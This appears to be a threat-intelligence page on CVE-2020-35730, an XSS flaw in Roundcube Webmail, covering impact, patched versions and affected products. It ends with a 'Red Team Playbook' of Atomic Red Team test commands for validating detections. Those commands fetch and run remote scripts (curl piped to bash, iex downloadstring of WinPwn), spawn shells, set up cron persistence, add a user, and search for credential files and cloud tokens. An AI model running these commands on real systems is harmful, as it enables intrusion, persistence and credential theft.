CVE-2020-35730
Overview
This vulnerability is a cross-site scripting (XSS) flaw caused by improper sanitization of JavaScript code embedded within link reference elements. The root cause lies in the mishandling of input by the function linkref_addindex in the file rcube_string_replacer.php. This affects the Roundcube Webmail software, specifically its link reference processing component.
Vulnerability Description
An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16, and 1.4.x before 1.4.10. The attacker can send a plain text e-mail message, with JavaScript in a link reference element that is mishandled by linkref_addindex in rcube_string_replacer.php.
Impact
An unauthenticated attacker can execute arbitrary JavaScript in the context of a victim's browser by sending a specially crafted email. This requires the victim to interact with the malicious email, such as viewing or previewing it in Roundcube Webmail. Successful exploitation can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of the user, potentially compromising sensitive email data or user accounts.
Solution
Users should upgrade Roundcube Webmail to version 1.2.13, 1.3.16, or 1.4.10 or later, as detailed in the Fedora Project advisories available at https://lists.fedoraproject.org/archives/list/[email protected]/message/HMLIZWKMTRCLU7KZLEQHELS4INXJ7X5Q/ and https://lists.fedoraproject.org/archives/list/[email protected]/message/HCEU4BM5WGIDJWP6Z4PCH62ZMH57QYM2/. These updates include patches that properly sanitize link reference elements to prevent script injection.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roundcube Webmail is characterized by a cross-site scripting (XSS) flaw that arises from improper handling of JavaScript within link reference elements. Specifically, the issue is rooted in the `linkref_addindex` function found in the `rcube_string_replacer.php` file. When an attacker crafts a plain text email containing malicious JavaScript embedded in a link reference, the webmail application fails to adequately sanitize or encode this input. As a result, when the email is rendered in the user's browser, the malicious script can execute, potentially leading to unauthorized actions or data exposure.
Attack vectors for this vulnerability primarily involve social engineering tactics, where an attacker sends a crafted email to a target user. The email appears benign, but it contains a link that, when clicked, executes the embedded JavaScript. This could lead to various exploitation scenarios, such as session hijacking, where the attacker gains access to the user's session cookies, or phishing, where the user is redirected to a malicious site designed to steal credentials. The ease of crafting such emails, combined with the potential for widespread distribution, makes this vulnerability particularly concerning for organizations using the affected versions of Roundcube Webmail.
The real-world impact of this vulnerability can be significant, especially for businesses that rely on webmail for communication. Successful exploitation could lead to data breaches, loss of sensitive information, and damage to the organization's reputation. Additionally, if an attacker gains access to internal communications, they may exploit this information for further attacks, such as spear phishing or lateral movement within the organization. The financial implications of such breaches can be substantial, not only from immediate remediation costs but also from potential regulatory fines and loss of customer trust.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating Roundcube Webmail to the latest versions is crucial, as these updates often include security patches that address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests and provide an additional layer of security against XSS attacks. Educating users about the risks of clicking on unknown links and implementing email filtering solutions can also reduce the likelihood of successful exploitation. Monitoring for unusual activity, such as unexpected session logins or changes in user behavior, can aid in early detection of potential breaches.
In conclusion, the XSS vulnerability in Roundcube Webmail poses a significant threat to organizations that utilize this platform for email communication. Understanding the technical details, potential attack vectors, and real-world implications is essential for cybersecurity professionals tasked with protecting sensitive information. By adopting proactive detection and mitigation strategies, organizations can safeguard against exploitation and minimize the associated risks.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-35730, with new exploitation attempts emerging after a period of relative quiet. Although the EPSS score for this vulnerability has decreased significantly, indicating a reduced likelihood of widespread exploitation, our telemetry reveals an uptick in targeted attempts leveraging this XSS flaw, often chained with other vulnerabilities such as CVE-2021-44026 to facilitate more impactful attacks. This shift underscores that adversaries continue to explore and refine attack chains involving Roundcube Webmail, maintaining its relevance in threat actor toolkits. For defenders, this development signals the need to maintain vigilance despite the lower general exploitation probability, as focused campaigns could still pose substantial risk to affected environments. Consequently, while the overall threat level remains medium, the observed increase in targeted exploitation attempts elevates the operational risk for organizations running vulnerable Roundcube versions.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
skyllpro/CVE-2021-44026-PoC
Bug Chain XSS (CVE-2020-35730 and CVE-2023-43770) to SQLi (CVE-2021-44026)
|
skyllpro | 0 | 0 | 2025-04-20 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.